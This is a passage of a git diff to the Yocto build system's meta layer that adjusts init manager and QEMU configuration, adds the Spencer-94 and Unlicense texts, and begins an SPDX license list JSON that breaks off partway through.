-#VIRTUAL-RUNTIME_init_manager = "systemd"
-#VIRTUAL-RUNTIME_initscripts = "systemd-compat-units"
+#INIT_MANAGER = "none"
+#INIT_MANAGER = "sysvinit"
+#INIT_MANAGER = "systemd"
+#INIT_MANAGER = "mdev-busybox"
#
# Use a full set of packages instead of busybox for base utils
diff --git a/meta/conf/machine/include/qemu.inc b/meta/conf/machine/include/qemu.inc
index 8dedb1a42d..7d0a6fe458 100644
--- a/meta/conf/machine/include/qemu.inc
+++ b/meta/conf/machine/include/qemu.inc
@@ -21,7 +21,7 @@ RDEPENDS_${KERNEL_PACKAGE_NAME}-base = ""
# Use a common kernel recipe for all QEMU machines
PREFERRED_PROVIDER_virtual/kernel ??= "linux-yocto"
-EXTRA_IMAGEDEPENDS += "qemu-native qemu-helper-native"
+EXTRA_IMAGEDEPENDS += "qemu-system-native qemu-helper-native"
# Provide the nfs server kernel module for all qemu images
KERNEL_FEATURES_append_pn-linux-yocto = " features/nfsd/nfsd-enable.scc"
diff --git a/meta/conf/multilib.conf b/meta/conf/multilib.conf
index d231107f8b..e9767c73b6 100644
--- a/meta/conf/multilib.conf
+++ b/meta/conf/multilib.conf
@@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot"
+
INHERIT += "multilib_global"
BBCLASSEXTEND_append = " ${MULTILIBS}"
diff --git a/meta/files/common-licenses/Spencer-94 b/meta/files/common-licenses/Spencer-94
new file mode 100644
index 0000000000..75ba7f7d2e
--- /dev/null
+++ b/meta/files/common-licenses/Spencer-94
@@ -0,0 +1,12 @@
+Copyright 1992, 1993, 1994 Henry Spencer. All rights reserved.
+This software is not subject to any license of the American Telephone and Telegraph Company or of the Regents of the University of California.
+
+Permission is granted to anyone to use this software for any purpose on any computer system, and to alter it and redistribute it, subject to the following restrictions:
+
+1. The author is not responsible for the consequences of use of this software, no matter how awful, even if they arise from flaws in it.
+
+2. The origin of this software must not be misrepresented, either by explicit claim or by omission. Since few users ever read sources, credits must appear in the documentation.
+
+3. Altered versions must be plainly marked as such, and must not be misrepresented as being the original software. Since few users ever read sources, credits must appear in the documentation.
+
+4. This notice may not be removed or altered.
diff --git a/meta/files/common-licenses/Unlicense b/meta/files/common-licenses/Unlicense
new file mode 100644
index 0000000000..68a49daad8
--- /dev/null
+++ b/meta/files/common-licenses/Unlicense
@@ -0,0 +1,24 @@
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or
+distribute this software, either in source code form or as a compiled
+binary, for any purpose, commercial or non-commercial, and by any
+means.
+
+In jurisdictions that recognize copyright laws, the author or authors
+of this software dedicate any and all copyright interest in the
+software to the public domain. We make this dedication for the benefit
+of the public at large and to the detriment of our heirs and
+successors. We intend this dedication to be an overt act of
+relinquishment in perpetuity of all present and future rights to this
+software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
+OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
+ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <http://unlicense.org/>
diff --git a/meta/files/fs-perms-persistent-log.txt b/meta/files/fs-perms-persistent-log.txt
index 3a7cf3ab94..518c1be3c9 100644
--- a/meta/files/fs-perms-persistent-log.txt
+++ b/meta/files/fs-perms-persistent-log.txt
@@ -41,7 +41,7 @@ ${includedir} 0755 root root true 0644 root root
${oldincludedir} 0755 root root true 0644 root root
# Cleanup debug src
-/usr/src/debug 0755 root root true - root root
+/usr/src/debug 0755 root root true 0644 root root
# Items from base-files
# Links
diff --git a/meta/files/fs-perms.txt b/meta/files/fs-perms.txt
index c8c3ac5dbe..daa4aed840 100644
--- a/meta/files/fs-perms.txt
+++ b/meta/files/fs-perms.txt
@@ -41,7 +41,7 @@ ${includedir} 0755 root root true 0644 root root
${oldincludedir} 0755 root root true 0644 root root
# Cleanup debug src
-/usr/src/debug 0755 root root true - root root
+/usr/src/debug 0755 root root true 0644 root root
# Items from base-files
# Links
diff --git a/meta/files/spdx-licenses.json b/meta/files/spdx-licenses.json
new file mode 100644
index 0000000000..ef926164ec
--- /dev/null
+++ b/meta/files/spdx-licenses.json
@@ -0,0 +1,5937 @@
+{
+ "licenseListVersion": "3.14",
+ "licenses": [
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0.json",
+ "referenceNumber": 0,
+ "name": "GNU General Public License v1.0 only",
+ "licenseId": "GPL-1.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/bzip2-1.0.6.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.6.json",
+ "referenceNumber": 1,
+ "name": "bzip2 and libbzip2 License v1.0.6",
+ "licenseId": "bzip2-1.0.6",
+ "seeAlso": [
+ "https://sourceware.org/git/?p\u003dbzip2.git;a\u003dblob;f\u003dLICENSE;hb\u003dbzip2-1.0.6",
+ "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Intel-ACPI.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Intel-ACPI.json",
+ "referenceNumber": 2,
+ "name": "Intel ACPI Software License Agreement",
+ "licenseId": "Intel-ACPI",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Intel_ACPI_Software_License_Agreement"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/XSkat.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/XSkat.json",
+ "referenceNumber": 3,
+ "name": "XSkat License",
+ "licenseId": "XSkat",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/XSkat_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.json",
+ "referenceNumber": 4,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 Generic",
+ "licenseId": "CC-BY-NC-SA-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Plexus.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Plexus.json",
+ "referenceNumber": 5,
+ "name": "Plexus Classworlds License",
+ "licenseId": "Plexus",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Plexus_Classworlds_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Giftware.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Giftware.json",
+ "referenceNumber": 6,
+ "name": "Giftware License",
+ "licenseId": "Giftware",
+ "seeAlso": [
+ "http://liballeg.org/license.html#allegro-4-the-giftware-license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BitTorrent-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.0.json",
+ "referenceNumber": 7,
+ "name": "BitTorrent Open Source License v1.0",
+ "licenseId": "BitTorrent-1.0",
+ "seeAlso": [
+ "http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/licenses/BitTorrent?r1\u003d1.1\u0026r2\u003d1.1.1.1\u0026diff_format\u003ds"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.1.json",
+ "referenceNumber": 8,
+ "name": "Apple Public Source License 1.1",
+ "licenseId": "APSL-1.1",
+ "seeAlso": [
+ "http://www.opensource.apple.com/source/IOSerialFamily/IOSerialFamily-7/APPLE_LICENSE"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.json",
+ "referenceNumber": 9,
+ "name": "GNU General Public License v2.0 w/GCC Runtime Library exception",
+ "licenseId": "GPL-2.0-with-GCC-exception",
+ "seeAlso": [
+ "https://gcc.gnu.org/git/?p\u003dgcc.git;a\u003dblob;f\u003dgcc/libgcc1.c;h\u003d762f5143fc6eed57b6797c82710f3538aa52b40b;hb\u003dcb143a3ce4fb417c68f5fa2691a1b1b1053dfba9#l10"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/UPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/UPL-1.0.json",
+ "referenceNumber": 10,
+ "name": "Universal Permissive License v1.0",
+ "licenseId": "UPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/UPL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/wxWindows.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/wxWindows.json",
+ "referenceNumber": 11,
+ "name": "wxWindows Library License",
+ "licenseId": "wxWindows",
+ "seeAlso": [
+ "https://opensource.org/licenses/WXwindows"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Caldera.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Caldera.json",
+ "referenceNumber": 12,
+ "name": "Caldera License",
+ "licenseId": "Caldera",
+ "seeAlso": [
+ "http://www.lemis.com/grog/UNIX/ancient-source-all.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zend-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zend-2.0.json",
+ "referenceNumber": 13,
+ "name": "Zend License v2.0",
+ "licenseId": "Zend-2.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20130517195954/http://www.zend.com/license/2_00.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CUA-OPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CUA-OPL-1.0.json",
+ "referenceNumber": 14,
+ "name": "CUA Office Public License v1.0",
+ "licenseId": "CUA-OPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CUA-OPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/JPNIC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JPNIC.json",
+ "referenceNumber": 15,
+ "name": "Japan Network Information Center License",
+ "licenseId": "JPNIC",
+ "seeAlso": [
+ "https://gitlab.isc.org/isc-projects/bind9/blob/master/COPYRIGHT#L366"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SAX-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SAX-PD.json",
+ "referenceNumber": 16,
+ "name": "Sax Public Domain Notice",
+ "licenseId": "SAX-PD",
+ "seeAlso": [
+ "http://www.saxproject.org/copying.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.5.json",
+ "referenceNumber": 17,
+ "name": "Creative Commons Attribution No Derivatives 2.5 Generic",
+ "licenseId": "CC-BY-ND-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/eGenix.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/eGenix.json",
+ "referenceNumber": 18,
+ "name": "eGenix.com Public License 1.1.0",
+ "licenseId": "eGenix",
+ "seeAlso": [
+ "http://www.egenix.com/products/eGenix.com-Public-License-1.1.0.pdf",
+ "https://fedoraproject.org/wiki/Licensing/eGenix.com_Public_License_1.1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPLLR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPLLR.json",
+ "referenceNumber": 19,
+ "name": "Lesser General Public License For Linguistic Resources",
+ "licenseId": "LGPLLR",
+ "seeAlso": [
+ "http://www-igm.univ-mlv.fr/~unitex/lgpllr.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.2.json",
+ "referenceNumber": 20,
+ "name": "Open LDAP Public License 2.2.2",
+ "licenseId": "OLDAP-2.2.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003ddf2cc1e21eb7c160695f5b7cffd6296c151ba188"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.json",
+ "referenceNumber": 21,
+ "name": "Creative Commons Attribution No Derivatives 3.0 Germany",
+ "licenseId": "CC-BY-ND-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IPA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IPA.json",
+ "referenceNumber": 22,
+ "name": "IPA Font License",
+ "licenseId": "IPA",
+ "seeAlso": [
+ "https://opensource.org/licenses/IPA"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NCSA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NCSA.json",
+ "referenceNumber": 23,
+ "name": "University of Illinois/NCSA Open Source License",
+ "licenseId": "NCSA",
+ "seeAlso": [
+ "http://otm.illinois.edu/uiuc_openSource",
+ "https://opensource.org/licenses/NCSA"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C.json",
+ "referenceNumber": 24,
+ "name": "W3C Software Notice and License (2002-12-31)",
+ "licenseId": "W3C",
+ "seeAlso": [
+ "http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231.html",
+ "https://opensource.org/licenses/W3C"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Adobe-2006.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Adobe-2006.json",
+ "referenceNumber": 25,
+ "name": "Adobe Systems Incorporated Source Code License Agreement",
+ "licenseId": "Adobe-2006",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AdobeLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Net-SNMP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Net-SNMP.json",
+ "referenceNumber": 26,
+ "name": "Net-SNMP License",
+ "licenseId": "Net-SNMP",
+ "seeAlso": [
+ "http://net-snmp.sourceforge.net/about/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-4.0.json",
+ "referenceNumber": 27,
+ "name": "Creative Commons Attribution Share Alike 4.0 International",
+ "licenseId": "CC-BY-SA-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/4.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/YPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/YPL-1.0.json",
+ "referenceNumber": 28,
+ "name": "Yahoo! Public License v1.0",
+ "licenseId": "YPL-1.0",
+ "seeAlso": [
+ "http://www.zimbra.com/license/yahoo_public_license_1.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Nunit.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/Nunit.json",
+ "referenceNumber": 29,
+ "name": "Nunit License",
+ "licenseId": "Nunit",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Nunit"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MITNFA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MITNFA.json",
+ "referenceNumber": 30,
+ "name": "MIT +no-false-attribs license",
+ "licenseId": "MITNFA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MITNFA"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PHP-3.01.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PHP-3.01.json",
+ "referenceNumber": 31,
+ "name": "PHP License v3.01",
+ "licenseId": "PHP-3.01",
+ "seeAlso": [
+ "http://www.php.net/license/3_01.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-Source-Code.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-Source-Code.json",
+ "referenceNumber": 32,
+ "name": "BSD Source Code Attribution",
+ "licenseId": "BSD-Source-Code",
+ "seeAlso": [
+ "https://github.com/robbiehanson/CocoaHTTPServer/blob/master/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.5.json",
+ "referenceNumber": 33,
+ "name": "Creative Commons Attribution Share Alike 2.5 Generic",
+ "licenseId": "CC-BY-SA-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Motosoto.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Motosoto.json",
+ "referenceNumber": 34,
+ "name": "Motosoto License",
+ "licenseId": "Motosoto",
+ "seeAlso": [
+ "https://opensource.org/licenses/Motosoto"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-1.1.json",
+ "referenceNumber": 35,
+ "name": "Open Software License 1.1",
+ "licenseId": "OSL-1.1",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/OSL1.1"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NGPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NGPL.json",
+ "referenceNumber": 36,
+ "name": "Nethack General Public License",
+ "licenseId": "NGPL",
+ "seeAlso": [
+ "https://opensource.org/licenses/NGPL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.5-AU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5-AU.json",
+ "referenceNumber": 37,
+ "name": "Creative Commons Attribution 2.5 Australia",
+ "licenseId": "CC-BY-2.5-AU",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.5/au/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-TOU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-TOU.json",
+ "referenceNumber": 38,
+ "name": "Unicode Terms of Use",
+ "licenseId": "Unicode-TOU",
+ "seeAlso": [
+ "http://www.unicode.org/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.json",
+ "referenceNumber": 39,
+ "name": "BSD 3-Clause No Nuclear License",
+ "licenseId": "BSD-3-Clause-No-Nuclear-License",
+ "seeAlso": [
+ "http://download.oracle.com/otn-pub/java/licenses/bsd.txt?AuthParam\u003d1467140197_43d516ce1776bd08a58235a7785be1cc"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OPUBL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OPUBL-1.0.json",
+ "referenceNumber": 40,
+ "name": "Open Publication License v1.0",
+ "licenseId": "OPUBL-1.0",
+ "seeAlso": [
+ "http://opencontent.org/openpub/",
+ "https://www.debian.org/opl",
+ "https://www.ctan.org/license/opl"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.json",
+ "referenceNumber": 41,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 England and Wales",
+ "licenseId": "CC-BY-NC-SA-2.0-UK",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/uk/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLOD-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLOD-2.0.json",
+ "referenceNumber": 42,
+ "name": "Norwegian Licence for Open Government Data (NLOD) 2.0",
+ "licenseId": "NLOD-2.0",
+ "seeAlso": [
+ "http://data.norge.no/nlod/en/2.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/gnuplot.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/gnuplot.json",
+ "referenceNumber": 43,
+ "name": "gnuplot License",
+ "licenseId": "gnuplot",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Gnuplot"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPICS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPICS.json",
+ "referenceNumber": 44,
+ "name": "EPICS Open License",
+ "licenseId": "EPICS",
+ "seeAlso": [
+ "https://epics.anl.gov/license/open.php"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Info-ZIP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Info-ZIP.json",
+ "referenceNumber": 45,
+ "name": "Info-ZIP License",
+ "licenseId": "Info-ZIP",
+ "seeAlso": [
+ "http://www.info-zip.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.json",
+ "referenceNumber": 46,
+ "name": "Open LDAP Public License v2.0 (or possibly 2.0A and 2.0B)",
+ "licenseId": "OLDAP-2.0",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcbf50f4e1185a21abd4c0a54d3f4341fe28f36ea"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-P-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-P-2.0.json",
+ "referenceNumber": 47,
+ "name": "CERN Open Hardware Licence Version 2 - Permissive",
+ "licenseId": "CERN-OHL-P-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.json",
+ "referenceNumber": 48,
+ "name": "BSD 3-Clause No Nuclear Warranty",
+ "licenseId": "BSD-3-Clause-No-Nuclear-Warranty",
+ "seeAlso": [
+ "https://jogamp.org/git/?p\u003dgluegen.git;a\u003dblob_plain;f\u003dLICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AML.json",
+ "referenceNumber": 49,
+ "name": "Apple MIT License",
+ "licenseId": "AML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Apple_MIT_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MulanPSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MulanPSL-1.0.json",
+ "referenceNumber": 50,
+ "name": "Mulan Permissive Software License, Version 1",
+ "licenseId": "MulanPSL-1.0",
+ "seeAlso": [
+ "https://license.coscl.org.cn/MulanPSL/",
+ "https://github.com/yuwenlong/longphp/blob/25dfb70cc2a466dc4bb55ba30901cbce08d164b5/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Multics.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Multics.json",
+ "referenceNumber": 51,
+ "name": "Multics License",
+ "licenseId": "Multics",
+ "seeAlso": [
+ "https://opensource.org/licenses/Multics"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/VSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/VSL-1.0.json",
+ "referenceNumber": 52,
+ "name": "Vovida Software License v1.0",
+ "licenseId": "VSL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/VSL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/RSA-MD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RSA-MD.json",
+ "referenceNumber": 53,
+ "name": "RSA Message-Digest License",
+ "licenseId": "RSA-MD",
+ "seeAlso": [
+ "http://www.faqs.org/rfcs/rfc1321.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-PDDC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-PDDC.json",
+ "referenceNumber": 54,
+ "name": "Creative Commons Public Domain Dedication and Certification",
+ "licenseId": "CC-PDDC",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/publicdomain/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.json",
+ "referenceNumber": 55,
+ "name": "Creative Commons Attribution Share Alike 2.1 Japan",
+ "licenseId": "CC-BY-SA-2.1-JP",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.1/jp/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.2.json",
+ "referenceNumber": 56,
+ "name": "LaTeX Project Public License v1.2",
+ "licenseId": "LPPL-1.2",
+ "seeAlso": [
